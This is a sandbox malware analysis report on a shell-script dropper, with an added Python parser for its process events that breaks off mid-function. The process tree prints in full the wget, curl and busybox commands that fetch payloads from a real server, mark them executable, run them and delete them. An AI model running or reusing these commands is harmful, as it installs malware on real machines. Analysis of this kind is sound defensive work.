Analysis
-
max time kernel: 34s
max time network: 35s
platform: debian-9_armhf
resource: debian9-armhf-20240418-en
resource tags: arch:armhf, image:debian9-armhf-20240418-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
submitted: 21/10/2024, 01:30
Static task
static1
Behavioral tasks (all on the same sample, 9269b23681aa621799bf65d165337d63101804bfb715857b2d462a891fc14c2b.sh)
behavioral1: resource ubuntu1804-amd64-20240729-en
behavioral2: resource debian9-armhf-20240418-en (this report)
behavioral3: resource debian9-mipsbe-20240611-en
behavioral4: resource debian9-mipsel-20240729-en
General
-
Target: 9269b23681aa621799bf65d165337d63101804bfb715857b2d462a891fc14c2b.sh
Size: 10KB
MD5: bd77f6652549a8b0545e6296982a1ac8
SHA1: 1b2fba63b17d3b1b6408006f4fd88c0774f434ce
SHA256: 9269b23681aa621799bf65d165337d63101804bfb715857b2d462a891fc14c2b
SHA512: 7953842db2ac9405140c5484229617b419a3e7e708089c0874dc8093818df33a1c9021685315fbdd46912ffb2291530bd1a9e73449a415ba718b6d6143a1059d
SSDEEP: 96:50UpzQs+B+82C/GGSF5iRBuYQohM93Y69bY+2C/GGZkF5iRBtpKEjQoxMVUm0UpM:zuB+TwK3yxuJ
Malware Config
Signatures
-
File and Directory Permissions Modification (1 TTP, 25 IoCs)
Adversaries may modify file or directory permissions to evade defenses.
Process: chmod in all 25 cases. Every call in the process tree is `chmod 777 <payload>` on a file the script has just downloaded into /tmp, i.e. the file is made world-writable as well as executable.
PIDs (sorted): 721, 753, 759, 765, 771, 777, 783, 789, 795, 801, 807, 813, 819, 825, 831, 839, 845, 851, 859, 868, 874, 880, 886, 892, 898
Executes dropped EXE (25 IoCs)
In every case the process name is the basename of the file in /tmp. 14 distinct file names are run; 11 of them are run twice.
PID 723  /tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA
PID 754  /tmp/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz
PID 760  /tmp/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb
PID 766  /tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S
PID 772  /tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly
PID 778  /tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m
PID 784  /tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp
PID 790  /tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ
PID 796  /tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq
PID 802  /tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N
PID 808  /tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj
PID 814  /tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp
PID 820  /tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67
PID 826  /tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT
PID 832  /tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly
PID 840  /tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m
PID 846  /tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67
PID 852  /tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT
PID 860  /tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp
PID 869  /tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ
PID 875  /tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq
PID 881  /tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N
PID 887  /tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj
PID 893  /tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp
PID 899  /tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S
Checks CPU configuration (1 TTP, 25 IoCs)
Checks CPU information which indicates whether the system is a virtual machine.
File opened for reading: /proc/cpuinfo, 25 times, every time by curl (one read per `curl -O` invocation in the process tree).
Caveat: all 25 hits come from /usr/bin/curl, the stock downloader the script invokes, not from the dropped payloads. Reading /proc/cpuinfo is ordinary start-up behaviour for curl and its libraries, so this signature (and the Virtualization/Sandbox Evasion mapping derived from it) is not evidence that the sample itself performs sandbox checks.
Reads runtime system information (50 IoCs)
Reads entries of the /proc virtual filesystem describing the running system.
File opened for reading: /proc/sys/crypto/fips_enabled, 25 times, by curl.
File opened for reading: /proc/self/auxv, 25 times, by curl.
As with the CPU check above, every hit is attributed to /usr/bin/curl (two reads per `curl -O` invocation), not to the dropped payloads.
System Network Configuration Discovery (1 TTP, 10 IoCs)
Adversaries may gather information about the network configuration of a system.
PID 816  wget
PID 817  curl
PID 818  busybox
PID 820  271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67
PID 821  rm
PID 842  wget
PID 843  curl
PID 844  busybox
PID 846  271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67
PID 847  rm
All ten hits fall in the two fetch/exec/rm cycles of 271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 (PIDs 816-821 and 842-847); it is the only one of the 14 payload names whose cycle carries this signature. The report does not list which network-configuration files or calls were touched.
Writes file to tmp directory (25 IoCs)
Malware often drops required files in the /tmp directory.
File opened for modification by curl (count in parentheses; 14 distinct names, 11 of them written twice):
/tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA (1)
/tmp/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz (1)
/tmp/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb (1)
/tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S (2)
/tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly (2)
/tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m (2)
/tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp (2)
/tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ (2)
/tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq (2)
/tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N (2)
/tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj (2)
/tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp (2)
/tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 (2)
/tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT (2)
Processes
-
Depth 1 is the submitted script; every other process is a direct child of it (depth 2). Each entry is PID, process image, command line, and the signatures the sandbox attached to that process, abbreviated as:
[C] Checks CPU configuration  [R] Reads runtime system information  [T] Writes file to tmp directory
[P] File and Directory Permissions Modification  [E] Executes dropped EXE  [N] System Network Configuration Discovery

The script fetches each payload three ways in turn (wget, curl -O, busybox wget), marks it 777, runs it and removes it. The 14 payload names are processed in two passes (PIDs 643-827 and 828-900) in different orders; the recording ends at PID 901 with a third wget for the first name.

PID 638  /tmp/9269b23681aa621799bf65d165337d63101804bfb715857b2d462a891fc14c2b.sh  /tmp/9269b23681aa621799bf65d165337d63101804bfb715857b2d462a891fc14c2b.sh
  PID 640  /bin/rm  rm bins.sh

  PID 643  /usr/bin/wget  wget http://87.120.126.196/bins/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA
  PID 670  /usr/bin/curl  curl -O http://87.120.126.196/bins/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA  [C R T]
  PID 684  /bin/busybox  /bin/busybox wget http://87.120.126.196/bins/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA
  PID 721  /bin/chmod  chmod 777 RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA  [P]
  PID 723  /tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA  ./RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA  [E]
  PID 724  /bin/rm  rm RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA

  PID 726  /usr/bin/wget  wget http://87.120.126.196/bins/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz
  PID 746  /usr/bin/curl  curl -O http://87.120.126.196/bins/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz  [C R T]
  PID 751  /bin/busybox  /bin/busybox wget http://87.120.126.196/bins/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz
  PID 753  /bin/chmod  chmod 777 zunJs37CUY2h9nRreComkTdOAsAvGJSgPz  [P]
  PID 754  /tmp/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz  ./zunJs37CUY2h9nRreComkTdOAsAvGJSgPz  [E]
  PID 755  /bin/rm  rm zunJs37CUY2h9nRreComkTdOAsAvGJSgPz

  PID 756  /usr/bin/wget  wget http://87.120.126.196/bins/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb
  PID 757  /usr/bin/curl  curl -O http://87.120.126.196/bins/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb  [C R T]
  PID 758  /bin/busybox  /bin/busybox wget http://87.120.126.196/bins/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb
  PID 759  /bin/chmod  chmod 777 OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb  [P]
  PID 760  /tmp/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb  ./OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb  [E]
  PID 761  /bin/rm  rm OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb

  PID 762  /usr/bin/wget  wget http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S
  PID 763  /usr/bin/curl  curl -O http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S  [C R T]
  PID 764  /bin/busybox  /bin/busybox wget http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S
  PID 765  /bin/chmod  chmod 777 Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S  [P]
  PID 766  /tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S  ./Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S  [E]
  PID 767  /bin/rm  rm Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S

  PID 768  /usr/bin/wget  wget http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly
  PID 769  /usr/bin/curl  curl -O http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly  [C R T]
  PID 770  /bin/busybox  /bin/busybox wget http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly
  PID 771  /bin/chmod  chmod 777 pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly  [P]
  PID 772  /tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly  ./pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly  [E]
  PID 773  /bin/rm  rm pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly

  PID 774  /usr/bin/wget  wget http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m
  PID 775  /usr/bin/curl  curl -O http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m  [C R T]
  PID 776  /bin/busybox  /bin/busybox wget http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m
  PID 777  /bin/chmod  chmod 777 2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m  [P]
  PID 778  /tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m  ./2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m  [E]
  PID 779  /bin/rm  rm 2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m

  PID 780  /usr/bin/wget  wget http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp
  PID 781  /usr/bin/curl  curl -O http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp  [C R T]
  PID 782  /bin/busybox  /bin/busybox wget http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp
  PID 783  /bin/chmod  chmod 777 Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp  [P]
  PID 784  /tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp  ./Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp  [E]
  PID 785  /bin/rm  rm Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp

  PID 786  /usr/bin/wget  wget http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ
  PID 787  /usr/bin/curl  curl -O http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ  [C R T]
  PID 788  /bin/busybox  /bin/busybox wget http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ
  PID 789  /bin/chmod  chmod 777 I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ  [P]
  PID 790  /tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ  ./I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ  [E]
  PID 791  /bin/rm  rm I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ

  PID 792  /usr/bin/wget  wget http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq
  PID 793  /usr/bin/curl  curl -O http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq  [C R T]
  PID 794  /bin/busybox  /bin/busybox wget http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq
  PID 795  /bin/chmod  chmod 777 zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq  [P]
  PID 796  /tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq  ./zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq  [E]
  PID 797  /bin/rm  rm zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq

  PID 798  /usr/bin/wget  wget http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N
  PID 799  /usr/bin/curl  curl -O http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N  [C R T]
  PID 800  /bin/busybox  /bin/busybox wget http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N
  PID 801  /bin/chmod  chmod 777 h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N  [P]
  PID 802  /tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N  ./h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N  [E]
  PID 803  /bin/rm  rm h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N

  PID 804  /usr/bin/wget  wget http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj
  PID 805  /usr/bin/curl  curl -O http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj  [C R T]
  PID 806  /bin/busybox  /bin/busybox wget http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj
  PID 807  /bin/chmod  chmod 777 tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj  [P]
  PID 808  /tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj  ./tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj  [E]
  PID 809  /bin/rm  rm tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj

  PID 810  /usr/bin/wget  wget http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp
  PID 811  /usr/bin/curl  curl -O http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp  [C R T]
  PID 812  /bin/busybox  /bin/busybox wget http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp
  PID 813  /bin/chmod  chmod 777 nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp  [P]
  PID 814  /tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp  ./nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp  [E]
  PID 815  /bin/rm  rm nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp

  PID 816  /usr/bin/wget  wget http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67  [N]
  PID 817  /usr/bin/curl  curl -O http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67  [C R T N]
  PID 818  /bin/busybox  /bin/busybox wget http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67  [N]
  PID 819  /bin/chmod  chmod 777 271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67  [P]
  PID 820  /tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67  ./271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67  [E N]
  PID 821  /bin/rm  rm 271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67  [N]

  PID 822  /usr/bin/wget  wget http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT
  PID 823  /usr/bin/curl  curl -O http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT  [C R T]
  PID 824  /bin/busybox  /bin/busybox wget http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT
  PID 825  /bin/chmod  chmod 777 xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT  [P]
  PID 826  /tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT  ./xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT  [E]
  PID 827  /bin/rm  rm xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT

  PID 828  /usr/bin/wget  wget http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly
  PID 829  /usr/bin/curl  curl -O http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly  [C R T]
  PID 830  /bin/busybox  /bin/busybox wget http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly
  PID 831  /bin/chmod  chmod 777 pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly  [P]
  PID 832  /tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly  ./pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly  [E]
  PID 833  /bin/rm  rm pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly

  PID 834  /usr/bin/wget  wget http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m
  PID 836  /usr/bin/curl  curl -O http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m  [C R T]
  PID 838  /bin/busybox  /bin/busybox wget http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m
  PID 839  /bin/chmod  chmod 777 2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m  [P]
  PID 840  /tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m  ./2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m  [E]
  PID 841  /bin/rm  rm 2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m

  PID 842  /usr/bin/wget  wget http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67  [N]
  PID 843  /usr/bin/curl  curl -O http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67  [C R T N]
  PID 844  /bin/busybox  /bin/busybox wget http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67  [N]
  PID 845  /bin/chmod  chmod 777 271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67  [P]
  PID 846  /tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67  ./271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67  [E N]
  PID 847  /bin/rm  rm 271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67  [N]

  PID 848  /usr/bin/wget  wget http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT
  PID 849  /usr/bin/curl  curl -O http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT  [C R T]
  PID 850  /bin/busybox  /bin/busybox wget http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT
  PID 851  /bin/chmod  chmod 777 xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT  [P]
  PID 852  /tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT  ./xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT  [E]
  PID 853  /bin/rm  rm xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT

  PID 854  /usr/bin/wget  wget http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp
  PID 855  /usr/bin/curl  curl -O http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp  [C R T]
  PID 856  /bin/busybox  /bin/busybox wget http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp
  PID 859  /bin/chmod  chmod 777 Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp  [P]
  PID 860  /tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp  ./Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp  [E]
  PID 861  /bin/rm  rm Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp

  PID 862  /usr/bin/wget  wget http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ
  PID 863  /usr/bin/curl  curl -O http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ  [C R T]
  PID 867  /bin/busybox  /bin/busybox wget http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ
  PID 868  /bin/chmod  chmod 777 I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ  [P]
  PID 869  /tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ  ./I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ  [E]
  PID 870  /bin/rm  rm I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ

  PID 871  /usr/bin/wget  wget http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq
  PID 872  /usr/bin/curl  curl -O http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq  [C R T]
  PID 873  /bin/busybox  /bin/busybox wget http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq
  PID 874  /bin/chmod  chmod 777 zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq  [P]
  PID 875  /tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq  ./zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq  [E]
  PID 876  /bin/rm  rm zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq

  PID 877  /usr/bin/wget  wget http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N
  PID 878  /usr/bin/curl  curl -O http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N  [C R T]
  PID 879  /bin/busybox  /bin/busybox wget http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N
  PID 880  /bin/chmod  chmod 777 h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N  [P]
  PID 881  /tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N  ./h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N  [E]
  PID 882  /bin/rm  rm h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N

  PID 883  /usr/bin/wget  wget http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj
  PID 884  /usr/bin/curl  curl -O http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj  [C R T]
  PID 885  /bin/busybox  /bin/busybox wget http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj
  PID 886  /bin/chmod  chmod 777 tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj  [P]
  PID 887  /tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj  ./tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj  [E]
  PID 888  /bin/rm  rm tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj

  PID 889  /usr/bin/wget  wget http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp
  PID 890  /usr/bin/curl  curl -O http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp  [C R T]
  PID 891  /bin/busybox  /bin/busybox wget http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp
  PID 892  /bin/chmod  chmod 777 nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp  [P]
  PID 893  /tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp  ./nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp  [E]
  PID 894  /bin/rm  rm nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp

  PID 895  /usr/bin/wget  wget http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S
  PID 896  /usr/bin/curl  curl -O http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S  [C R T]
  PID 897  /bin/busybox  /bin/busybox wget http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S
  PID 898  /bin/chmod  chmod 777 Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S  [P]
  PID 899  /tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S  ./Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S  [E]
  PID 900  /bin/rm  rm Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S

  PID 901  /usr/bin/wget  wget http://87.120.126.196/bins/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA
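The process tree above is long but regular, and the signature list attributes most hits to curl rather than to the payloads. The following script is an added example, not part of the sandbox report and not code from the sample: it turns a list of process events into one chain per fetch/chmod/exec/rm cycle, reports which download host was contacted and which payloads actually ran, flags cycles that complete the self-deleting pattern, and records which process image raised each signature. EVENTS is a constructed, hand-typed subset of the tree (the first two payload cycles plus the lone trailing wget, with the report's PIDs, images, command lines and signature tags); feeding it the whole tree works the same way. The stage-classification rules (first token is a fetcher, `chmod`, `rm`, or `./name`) are an assumption about this script's command-line shapes, not a general parser.

```python
"""Reconstruct the dropper's fetch/chmod/exec/rm chains from sandbox process events.

Added example; not part of the sandbox report and not code from the sample.
EVENTS is a constructed subset of the report's process tree, typed in by hand.
"""
import re
from collections import defaultdict
from urllib.parse import urlparse

BASE = "http://87.120.126.196/bins/"            # download host from the report
A = "RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA"         # first payload name in the tree
B = "zunJs37CUY2h9nRreComkTdOAsAvGJSgPz"         # second payload name
CURL_SIGS = ("Checks CPU configuration", "Reads runtime system information",
             "Writes file to tmp directory")

# (pid, process image, command line, signatures the sandbox attached to it)
EVENTS = [
    (638, "/tmp/9269b23681aa621799bf65d165337d63101804bfb715857b2d462a891fc14c2b.sh",
     "/tmp/9269b23681aa621799bf65d165337d63101804bfb715857b2d462a891fc14c2b.sh", ()),
    (640, "/bin/rm", "rm bins.sh", ()),                    # the script's original name, most likely
    (643, "/usr/bin/wget", "wget " + BASE + A, ()),
    (670, "/usr/bin/curl", "curl -O " + BASE + A, CURL_SIGS),
    (684, "/bin/busybox", "/bin/busybox wget " + BASE + A, ()),
    (721, "/bin/chmod", "chmod 777 " + A, ("File and Directory Permissions Modification",)),
    (723, "/tmp/" + A, "./" + A, ("Executes dropped EXE",)),
    (724, "/bin/rm", "rm " + A, ()),
    (726, "/usr/bin/wget", "wget " + BASE + B, ()),
    (746, "/usr/bin/curl", "curl -O " + BASE + B, CURL_SIGS),
    (751, "/bin/busybox", "/bin/busybox wget " + BASE + B, ()),
    (753, "/bin/chmod", "chmod 777 " + B, ("File and Directory Permissions Modification",)),
    (754, "/tmp/" + B, "./" + B, ("Executes dropped EXE",)),
    (755, "/bin/rm", "rm " + B, ()),
    (901, "/usr/bin/wget", "wget " + BASE + A, ()),       # tree ends here: a fetch with no exec
]

URL_RE = re.compile(r"https?://\S+")
FETCHERS = {"wget", "curl", "/bin/busybox"}


def classify(cmdline):
    """Map a command line to (stage, payload name); (None, None) if unrelated."""
    parts = cmdline.split()
    if not parts:
        return None, None
    tool = parts[0]
    if tool in FETCHERS:
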